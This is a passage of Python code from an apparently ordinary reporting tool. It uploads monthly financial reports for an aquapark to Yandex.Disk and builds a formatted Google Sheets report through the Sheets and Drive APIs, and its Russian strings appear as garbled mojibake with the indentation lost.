logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะฟัะฐะฒะบะฐ ัะฐะนะปะฐ "{local_path.split("/")[-1]}" ะฒ YaDisk...')
files_list_yandex = list(self.yadisk.listdir(remote_folder))
files_list = []
for key in files_list_yandex:
if key['file']:
files_list.append(remote_folder + key['name'])
if remote_path in files_list:
logging.warning(
f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะคะฐะนะป "{local_path.split("/")[-1]}" ัะถะต ัััะตััะฒัะตั ะฒ "{remote_folder}" ะธ ะฑัะดะตั ะทะฐะผะตะฝะตะฝ!')
self.yadisk.remove(remote_path, permanently=True)
self.yadisk.upload(local_path, remote_path)
logging.info(
f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะคะฐะนะป "{local_path.split("/")[-1]}" ะพัะฟัะฐะฒะปะตะฝ ะฒ "{remote_folder}" YaDisk...')
else:
logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะัะธะฑะบะฐ YaDisk: token ะฝะต ะฒะฐะปะธะดะตะฝ')
self.show_dialog('ะัะธะฑะบะฐ ัะพะตะดะธะฝะตะฝะธั ั Yandex.Disc',
f'\nะััะตัั ัะพั
ัะฐะฝะตะฝั ะฒ ะฟะฐะฟะบะต {self.local_folder} '
f'ะธ ะฝะต ะฑัะดัั ะพัะฟัะฐะฒะปะตะฝั ะฝะฐ Yandex.Disc.')
else:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะตั ะฝะธ ะพะดะฝะพะณะพ ะพััะตัะฐ ะดะปั ะพัะฟัะฐะฒะบะธ ะฒ Yandex.Disk')
def create_path_yadisk(self, path):
"""
ะัะพะฒะตััะตั ะฝะฐะปะธัะธะต ัะบะฐะทะฐะฝะฝะพะณะพ ะฟััะธ ะฒ ะฏะฝะดะตะบั ะะธัะบะต. ะ ัะปััะฐะต ะพััััััะฒะธั ะบะฐะบะธั
-ะปะธะฑะพ ะฟะฐะฟะพะบ ัะพะทะดะฐะตั ะธั
:param path:
:return:
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะพะฒะตัะบะฐ ะฟััะตะน ัะพั
ัะฐะฝะตะฝะธั ัะฐะนะปะพะฒ ะฝะฐ ะฏะฝะดะตะบั.ะะธัะบะต...')
list_path = path.split('/')
path = ''
end_path = ''
if list_path[-1][-4:] == '.xls' or list_path[-1] == '':
end_path = list_path.pop()
list_path.append(self.date_from.strftime('%Y'))
list_path.append(self.date_from.strftime('%m') + '-' + self.date_from.strftime('%B'))
directory = '/'
list_path_yandex = []
for folder in list_path:
folder = directory + folder
directory = folder + '/'
list_path_yandex.append(folder)
directory = '/'
for folder in list_path_yandex:
folders_list = []
folders_list_yandex = list(self.yadisk.listdir(directory))
for key in folders_list_yandex:
if not key['file']:
folders_list.append(directory + key['name'])
if folder not in folders_list:
self.yadisk.mkdir(folder)
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพะทะดะฐะฝะธะต ะฝะพะฒะพะน ะฟะฐะฟะบะธ ะฒ YandexDisk - "{folder}"')
directory = folder + '/'
else:
directory = folder + '/'
path = list_path_yandex[-1] + '/'
return path
def export_to_google_sheet(self):
"""
ะคะพัะผะธัะพะฒะฐะฝะธะต ะธ ะทะฐะฟะพะปะฝะตะฝะธะต google-ัะฐะฑะปะธัั
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพั
ัะฐะฝะตะฝะธะต ะคะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ ะฒ Google-ัะฐะฑะปะธัะฐั
...')
self.doc_version = 10
self.sheet_width = 44
self.sheet2_width = 3
self.sheet3_width = 14
self.sheet4_width = 3
self.sheet5_width = 3
self.sheet6_width = 16
self.height = 40
self.sheet2_height = 40
self.sheet4_height = 300
self.sheet5_height = 300
self.sheet6_height = 40
# self.CREDENTIALS_FILE # ะธะผั ัะฐะนะปะฐ ั ะทะฐะบััััะผ ะบะปััะพะผ
credentials = ServiceAccountCredentials.from_json_keyfile_name(self.CREDENTIALS_FILE,
['https://www.googleapis.com/auth/spreadsheets',
'https://www.googleapis.com/auth/drive'])
httpAuth = credentials.authorize(httplib2.Http())
try:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะพะฟััะบะฐ ะฐะฒัะพัะธะทะฐัะธะธ ั Google-ะดะพะบัะผะตะฝัะฐะผะธ ...')
self.googleservice = apiclient.discovery.build('sheets', 'v4', http=httpAuth)
except IndexError as e:
logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะัะธะฑะบะฐ {repr(e)}')
self.data_report = datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0], '%m')
month = [
'',
'ะฏะฝะฒะฐัั',
'ะคะตะฒัะฐะปั',
'ะะฐัั',
'ะะฟัะตะปั',
'ะะฐะน',
'ะัะฝั',
'ะัะปั',
'ะะฒะณััั',
'ะกะตะฝััะฑัั',
'ะะบััะฑัั',
'ะะพัะฑัั',
'ะะตะบะฐะฑัั',
]
self.data_report = month[int(self.data_report)]
doc_name = f"{datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0], '%Y-%m')} " \
f"({self.data_report}) - ะคะธะฝะฐะฝัะพะฒัะน ะพััะตั ะฟะพ ะะบะฒะฐะฟะฐัะบั"
if self.finreport_dict['ะะฐัะฐ'][0] + timedelta(1) != self.finreport_dict['ะะฐัะฐ'][1]:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะญะบัะฟะพัั ะพััะตัะฐ ะฒ Google Sheet ะทะฐ ะฝะตัะบะพะปัะบะพ ะดะฝะตะน ะฝะตะฒะพะทะผะพะถะตะฝ!')
self.show_dialog('ะัะธะฑะบะฐ ัะบัะฟะพััะฐ ะฒ Google.Sheet',
'ะญะบัะฟะพัั ะพััะตัะฐ ะฒ Google Sheet ะทะฐ ะฝะตัะบะพะปัะบะพ ะดะฝะตะน ะฝะตะฒะพะทะผะพะถะตะฝ!')
else:
with open(self.list_google_docs, 'r', encoding='utf-8') as f:
links = csv.reader(f, delimiter=';')
self.google_links = {}
for line in links:
self.google_links[line[0]] = [line[1],]
if len(line) > 2:
self.google_links[line[0]].append(line[2])
else:
self.google_links[line[0]].append(0)
if self.date_from.strftime('%Y-%m') in self.google_links:
if int(self.google_links[self.date_from.strftime('%Y-%m')][1]) == self.doc_version:
self.google_doc = (self.date_from.strftime('%Y-%m'),
self.google_links[self.date_from.strftime('%Y-%m')][0])
else:
logging.error(f"{__name__}: {str(datetime.now())[:-7]}: "
f"ะะตััะธั ะคะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ ("
f"{self.google_links[self.date_from.strftime('%Y-%m')][1]}) "
f"ะฝะต ัะพะพัะฒะตัััะฒัะตั ัะตะบััะตะน ({self.doc_version}).\n"
f"ะะตะพะฑั
ะพะดะธะผะพ ัะฝะฐัะฐะปะฐ ัะดะฐะปะธัั ัััะพะบั ั ัััะปะบะพะน ะฝะฐ ััะฐััั ะฒะตััะธั ะธะท ัะฐะนะปะฐ "
f"\"list_google_docs.csv\" ะทะฐัะตะผ ะทะฐะฝะพะฒะพ ััะพัะผะธัะพะฒะฐัั ะพััะตั ั ะฝะฐัะฐะปะฐ ะผะตัััะฐ."
)
self.show_dialog("ะะตัะพะพัะฒะตัััะฒะธะต ะฒะตััะธะน ัะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ",
f"ะะตััะธั ะคะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ ("
f"{self.google_links[self.date_from.strftime('%Y-%m')][1]}) "
f"ะฝะต ัะพะพัะฒะตัััะฒัะตั ัะตะบััะตะน ({self.doc_version}).\n"
f"ะะตะพะฑั
ะพะดะธะผะพ ัะฝะฐัะฐะปะฐ ัะดะฐะปะธัั ัััะพะบั ั ัััะปะบะพะน ะฝะฐ ััะฐััั ะฒะตััะธั ะธะท ัะฐะนะปะฐ "
f"\"list_google_docs.csv\" ะทะฐัะตะผ ะทะฐะฝะพะฒะพ ััะพัะผะธัะพะฒะฐัั ะพััะตั ั ะฝะฐัะฐะปะฐ ะผะตัััะฐ.")
return None
else:
self.google_doc = None
# ะกะพะทะดะฐะฝะธะต ะดะพะบัะผะตะฝัะฐ
self.google_kwote_timer = datetime.now()
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพะทะดะฐะฝะธะต Google-ะดะพะบัะผะตะฝัะฐ...')
self.spreadsheet = self.googleservice.spreadsheets().create(body={
'properties': {'title': doc_name, 'locale': 'ru_RU'},
'sheets': [{'properties': {'sheetType': 'GRID',
'sheetId': 0,
'title': 'ะกะฒะพะดะฝัะน',
'gridProperties': {'rowCount': self.height,
'columnCount': self.sheet_width}}},
{'properties': {'sheetType': 'GRID',
'sheetId': 1,
'title': 'ะกะผะฐะนะป',
'gridProperties': {'rowCount': self.sheet2_height,
'columnCount': self.sheet2_width}}},
{'properties': {'sheetType': 'GRID',
'sheetId': 2,
'title': 'ะะปะฐะฝ',
'gridProperties': {'rowCount': self.height,
'columnCount': self.sheet3_width}}},
{'properties': {'sheetType': 'GRID',
'sheetId': 3,
'title': 'ะัะพะณะพะฒัะน',
'gridProperties': {'rowCount': self.sheet4_height,
'columnCount': self.sheet4_width}}},
{'properties': {'sheetType': 'GRID',
'sheetId': 4,
'title': 'ะัะพะณะพะฒัะน ะะ',
'gridProperties': {'rowCount': self.sheet5_height,
'columnCount': self.sheet5_width}}},
{'properties': {'sheetType': 'GRID',
'sheetId': 5,
'title': 'ะะปัะถ',
'gridProperties': {'rowCount': self.sheet6_height,
'columnCount': self.sheet6_width}}}
]
}).execute()
# ะะพัััะฟั ะบ ะดะพะบัะผะตะฝัั
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐัััะพะนะบะฐ ะดะพัััะฟะพะฒ ะบ ัะฐะนะปั GoogleSheets...')
self.google_reader_list = self.google_reader_list.split(',')
self.google_writer_list = self.google_writer_list.split(',')
driveService = apiclient.discovery.build('drive', 'v3', http=httpAuth)
if self.google_all_read:
shareRes = driveService.permissions().create(
fileId=self.spreadsheet['spreadsheetId'],
body={'type': 'anyone', 'role': 'reader'}, # ะดะพัััะฟ ะฝะฐ ััะตะฝะธะต ะบะพะผั ัะณะพะดะฝะพ
fields='id'
).execute()
# ะะพะทะผะพะถะฝัะต ะทะฝะฐัะตะฝะธั writer, commenter, reader
# ะดะพัััะฟ ะฝะฐ ะงัะตะฝะธะต ะพะฟัะตะดะตะปะตะฝะฝัะผ ะฟะพะปัะทะพะฒะฐัะตะปะพัะผ
for adress in self.google_reader_list:
shareRes = driveService.permissions().create(
fileId=self.spreadsheet['spreadsheetId'],
body={'type': 'user', 'role': 'reader', 'emailAddress': adress},
fields='id'
).execute()
# ะดะพัััะฟ ะฝะฐ ะะฐะฟะธัั ะพะฟัะตะดะตะปะตะฝะฝัะผ ะฟะพะปัะทะพะฒะฐัะตะปะพัะผ
for adress in self.google_writer_list:
shareRes = driveService.permissions().create(
fileId=self.spreadsheet['spreadsheetId'],
body={'type': 'user', 'role': 'writer', 'emailAddress': adress},
fields='id'
).execute()
# ะะะกะข 1
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพะทะดะฐะฝะธะต ะปะธััะฐ 1 ะฒ ัะฐะนะปะต GoogleSheets...')
sheetId = 0
# ะจะธัะธะฝะฐ ััะพะปะฑัะพะฒ
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId,
self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
ss.prepare_setColumnsWidth(0, 1, 105)
ss.prepare_setColumnsWidth(2, 7, 120)
ss.prepare_setColumnWidth(8, 65)
ss.prepare_setColumnWidth(9, 120)
ss.prepare_setColumnWidth(10, 100)
ss.prepare_setColumnsWidth(11, 12, 100)
ss.prepare_setColumnWidth(13, 65)
ss.prepare_setColumnWidth(14, 120)
ss.prepare_setColumnWidth(15, 100)
ss.prepare_setColumnWidth(16, 65)
ss.prepare_setColumnWidth(17, 120)
ss.prepare_setColumnWidth(18, 100)
ss.prepare_setColumnWidth(19, 65)
ss.prepare_setColumnWidth(20, 120)
ss.prepare_setColumnWidth(21, 100)
ss.prepare_setColumnWidth(22, 65)
ss.prepare_setColumnWidth(23, 120)
ss.prepare_setColumnWidth(24, 100)
ss.prepare_setColumnWidth(25, 65)
ss.prepare_setColumnWidth(26, 120)
ss.prepare_setColumnWidth(27, 100)
ss.prepare_setColumnWidth(28, 65)
ss.prepare_setColumnWidth(29, 120)
ss.prepare_setColumnWidth(30, 100)
ss.prepare_setColumnWidth(31, 65)
ss.prepare_setColumnWidth(32, 120)
ss.prepare_setColumnWidth(33, 100)
ss.prepare_setColumnWidth(34, 65)
ss.prepare_setColumnWidth(35, 120)
ss.prepare_setColumnWidth(36, 100)
ss.prepare_setColumnWidth(37, 65)
ss.prepare_setColumnWidth(38, 120)
ss.prepare_setColumnWidth(39, 65)
ss.prepare_setColumnWidth(40, 120)
ss.prepare_setColumnWidth(41, 100)
ss.prepare_setColumnWidth(42, 120)
ss.prepare_setColumnWidth(43, 120)
# ะะฑัะตะดะธะฝะตะฝะธะต ััะตะตะบ
ss.prepare_mergeCells("A1:A2")
ss.prepare_mergeCells("B1:B2")
ss.prepare_mergeCells("C1:C2")
ss.prepare_mergeCells("D1:D2")
ss.prepare_mergeCells("E1:E2")
ss.prepare_mergeCells("F1:F2")
ss.prepare_mergeCells("G1:G2")
ss.prepare_mergeCells("H1:H2")
ss.prepare_mergeCells("I1:K1")
ss.prepare_mergeCells("L1:L2")
ss.prepare_mergeCells("M1:M2")
ss.prepare_mergeCells("N1:P1")
ss.prepare_mergeCells("Q1:S1")
ss.prepare_mergeCells("T1:V1")
ss.prepare_mergeCells("W1:Y1")
ss.prepare_mergeCells("Z1:AB1")
ss.prepare_mergeCells("AC1:AE1")
ss.prepare_mergeCells("AF1:AH1")
ss.prepare_mergeCells("AI1:AK1")
ss.prepare_mergeCells("AL1:AM1")
ss.prepare_mergeCells("AN1:AP1")
ss.prepare_mergeCells("AQ1:AQ2")
ss.prepare_mergeCells("AR1:AR2")
# ะะฐะดะฐะฝะธะต ะฟะฐัะฐะผะตััะพะฒ ะณััะฟะฟะต ััะตะตะบ
# ะะธัะฝัะน, ะฟะพ ัะตะฝััั
ss.prepare_setCellsFormat('A1:AR2', {'horizontalAlignment': 'CENTER', 'textFormat': {'bold': True}})
# ss.prepare_setCellsFormat('E4:E8', {'numberFormat': {'pattern': '[h]:mm:ss', 'type': 'TIME'}},
# fields='userEnteredFormat.numberFormat')
# ะะฐะฟะพะปะฝะตะฝะธะต ัะฐะฑะปะธัั
ss.prepare_setValues("A1:AR2", [
[
"ะะฐัะฐ", "ะะตะฝั ะฝะตะดะตะปะธ", "ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ \nะะะะ", "ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ \nะคะะะข",
f"ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ \n{self.data_report} "
f"{datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0] - relativedelta(years=1), '%Y')}",
"ะะฑัะฐั ััะผะผะฐ \nะะะะ", "ะะฑัะฐั ััะผะผะฐ \nะคะะะข",
f"ะะฑัะฐั ััะผะผะฐ \n{self.data_report} "
f"{datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0] - relativedelta(years=1), '%Y')}",
"ะะธะปะตัั", "", "", "ะะตะฟะพะทะธั", "ะจััะฐั", "ะขะตัะผะพะทะพะฝะฐ", "", "", "ะะฑัะตะฟะธั ะะะะ", "", "", "ะะฑัะตะฟะธั ะคะะะข", "", "",
f"ะะฑัะตะฟะธั {self.data_report} "
f"{datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0] - relativedelta(years=1), '%Y')}", "", "",
"ะะธะปะตัั ะะะ ะ", "", "", "ะขะตัะผะพะทะพะฝะฐ ะะะ ะ", "", "", "ะะธะปะตัั ะ ะะ", "", "", "ะขะตัะผะพะทะพะฝะฐ ะ ะะ", "", "",
"ะัะพัะตะต", "", "Online ะัะพะดะฐะถะธ", "", "", "ะกัะผะผะฐ ะฑะตะทะฝะฐะป", "ะกัะผะผะฐ Biglion"
],
[
"", "", "", "", "", "", "", "", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ", "", "",
"ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
"ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
"ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
"ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
"ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ", "", ""
]
],
"ROWS")
# ss.prepare_setValues("D5:E6", [["This is D5", "This is D6"], ["This is E5", "=5+5"]], "COLUMNS")
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat("A1:AR2", {"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for i in range(2):
for j in range(self.sheet_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# ะะะกะข 2
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพะทะดะฐะฝะธะต ะปะธััะฐ 2 ะฒ ัะฐะนะปะต GoogleSheets...')
sheetId = 1
# ะจะธัะธะฝะฐ ััะพะปะฑัะพะฒ
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId,
self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
ss.prepare_setColumnsWidth(0, 2, 105)
# ะะฑัะตะดะธะฝะตะฝะธะต ััะตะตะบ
ss.prepare_mergeCells("A1:C1")
# ะะฐะดะฐะฝะธะต ะฟะฐัะฐะผะตััะพะฒ ะณััะฟะฟะต ััะตะตะบ
# ะะธัะฝัะน, ะฟะพ ัะตะฝััั
ss.prepare_setCellsFormat('A1:C2', {'horizontalAlignment': 'CENTER', 'textFormat': {'bold': True}})
# ss.prepare_setCellsFormat('E4:E8', {'numberFormat': {'pattern': '[h]:mm:ss', 'type': 'TIME'}},
# fields='userEnteredFormat.numberFormat')
# ะะฐะฟะพะปะฝะตะฝะธะต ัะฐะฑะปะธัั
ss.prepare_setValues(
"A1:C2", [
["ะกะผะฐะนะป", "", ""],
["ะะฐัะฐ", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ"]
],
"ROWS"
)
# ss.prepare_setValues("D5:E6", [["This is D5", "This is D6"], ["This is E5", "=5+5"]], "COLUMNS")
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat("A1:C2", {"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for i in range(2):
for j in range(self.sheet2_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# ะะะกะข 3
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพะทะดะฐะฝะธะต ะปะธััะฐ 3 ะฒ ัะฐะนะปะต GoogleSheets...')
sheetId = 2
# ะจะธัะธะฝะฐ ััะพะปะฑัะพะฒ
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId,
self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
ss.prepare_setColumnsWidth(0, 1, 100)
ss.prepare_setColumnsWidth(2, 7, 120)
ss.prepare_setColumnWidth(8, 65)
ss.prepare_setColumnWidth(9, 120)
ss.prepare_setColumnWidth(10, 100)
ss.prepare_setColumnWidth(8, 65)
ss.prepare_setColumnWidth(9, 120)
ss.prepare_setColumnWidth(10, 100)
# ะะฑัะตะดะธะฝะตะฝะธะต ััะตะตะบ
ss.prepare_mergeCells("A1:A2")
ss.prepare_mergeCells("B1:B2")
ss.prepare_mergeCells("C1:C2")
ss.prepare_mergeCells("D1:D2")
ss.prepare_mergeCells("E1:E2")
ss.prepare_mergeCells("F1:F2")
ss.prepare_mergeCells("G1:G2")
ss.prepare_mergeCells("H1:H2")
ss.prepare_mergeCells("I1:K1")
ss.prepare_mergeCells("L1:N1")
# ะะฐะดะฐะฝะธะต ะฟะฐัะฐะผะตััะพะฒ ะณััะฟะฟะต ััะตะตะบ
# ะะธัะฝัะน, ะฟะพ ัะตะฝััั
ss.prepare_setCellsFormat('A1:N2', {'horizontalAlignment': 'CENTER', 'textFormat': {'bold': True}})
# ss.prepare_setCellsFormat('E4:E8', {'numberFormat': {'pattern': '[h]:mm:ss', 'type': 'TIME'}},
# fields='userEnteredFormat.numberFormat')
# ะะฐะฟะพะปะฝะตะฝะธะต ัะฐะฑะปะธัั
ss.prepare_setValues("A1:N2", [
[
"ะะฐัะฐ", "ะะตะฝั ะฝะตะดะตะปะธ", "ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ \nะะ ะะะะะ", "ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ \nะคะะะข",
"ะะฑัะฐั ััะผะผะฐ \nะะ ะะะะะ", "ะะฑัะฐั ััะผะผะฐ \nะคะะะข",
"ะกัะตะดะฝะธะน ัะตะบ \nะะ ะะะะะ", "ะกัะตะดะฝะธะน ัะตะบ \nะคะะะข",
"ะะฑัะตะฟะธั ะะะะ", "", "", "ะะปัะถ ะะะะ", "", "",
],
[
"", "", "", "", "", "", "", "", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
"ะขัะฐัะธะบ", "ะะฑัะฐั ััะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
]
],
"ROWS")
# ss.prepare_setValues("D5:E6", [["This is D5", "This is D6"], ["This is E5", "=5+5"]], "COLUMNS")
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat("A1:N2", {"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for i in range(2):
for j in range(self.sheet3_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
# ss.runPrepared()
# ะะฐะฟะพะปะฝะตะฝะธะต ัะฐะฑะปะธัั 2
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ะปะธััะฐ 2 ะฒ ัะฐะนะปะต GoogleSheets...')
# ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId, self.googleservice,
# self.spreadsheet['sheets'][sheetId]['properties']['title'])
# ะะฐะฟะพะปะฝะตะฝะธะต ัััะพะบะธ ั ะดะฐะฝะฝัะผะธ
weekday_rus = [
"ะะพะฝะตะดะตะปัะฝะธะบ",
"ะัะพัะฝะธะบ",
"ะกัะตะดะฐ",
"ะงะตัะฒะตัะณ",
"ะััะฝะธัะฐ",
"ะกัะฑะฑะพัะฐ",
"ะะพัะบัะตัะตะฝัะต",
]
start_date = datetime.strptime(f"01{self.finreport_dict['ะะฐัะฐ'][0].strftime('%m%Y')}", '%d%m%Y')
enddate = start_date + relativedelta(months=1)
dateline = start_date
self.sheet2_line = 3
while dateline < enddate:
ss.prepare_setValues(
f"A{self.sheet2_line}:N{self.sheet2_line}",
[
[
datetime.strftime(dateline, '%d.%m.%Y'),
weekday_rus[dateline.weekday()],
"",
f'=IF(OR(\'ะกะฒะพะดะฝัะน\'!A{self.sheet2_line} = "ะะขะะะ";LEFT(\'ะกะฒะพะดะฝัะน\'!A{self.sheet2_line}; 10) = "ะัะฟะพะปะฝะตะฝะธะต");"";\'ะกะฒะพะดะฝัะน\'!D{self.sheet2_line})',
"",
f'=IF(OR(\'ะกะฒะพะดะฝัะน\'!A{self.sheet2_line} = "ะะขะะะ";LEFT(\'ะกะฒะพะดะฝัะน\'!A{self.sheet2_line}; 10) = "ะัะฟะพะปะฝะตะฝะธะต");"";\'ะกะฒะพะดะฝัะน\'!G{self.sheet2_line})',
f"=IFERROR(E{self.sheet2_line}/C{self.sheet2_line};0)",
f"=IFERROR(F{self.sheet2_line}/D{self.sheet2_line};0)",
"",
"",
f"=IFERROR(J{self.sheet2_line}/I{self.sheet2_line};0)",
"",
"",
f"=IFERROR(M{self.sheet2_line}/L{self.sheet2_line};0)",
]
],
"ROWS"
)
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัั ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{self.sheet2_line}:N{self.sheet2_line}",
[
[
{'numberFormat': {'type': 'DATE', 'pattern': 'dd.mm.yyyy'}},
{'numberFormat': {}},
{'numberFormat': {}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
if self.sheet2_line % 2 != 0:
ss.prepare_setCellsFormat(f"A{self.sheet2_line}:N{self.sheet2_line}",
{"backgroundColor": functions.htmlColorToJSON("#fef8e3")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet3_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
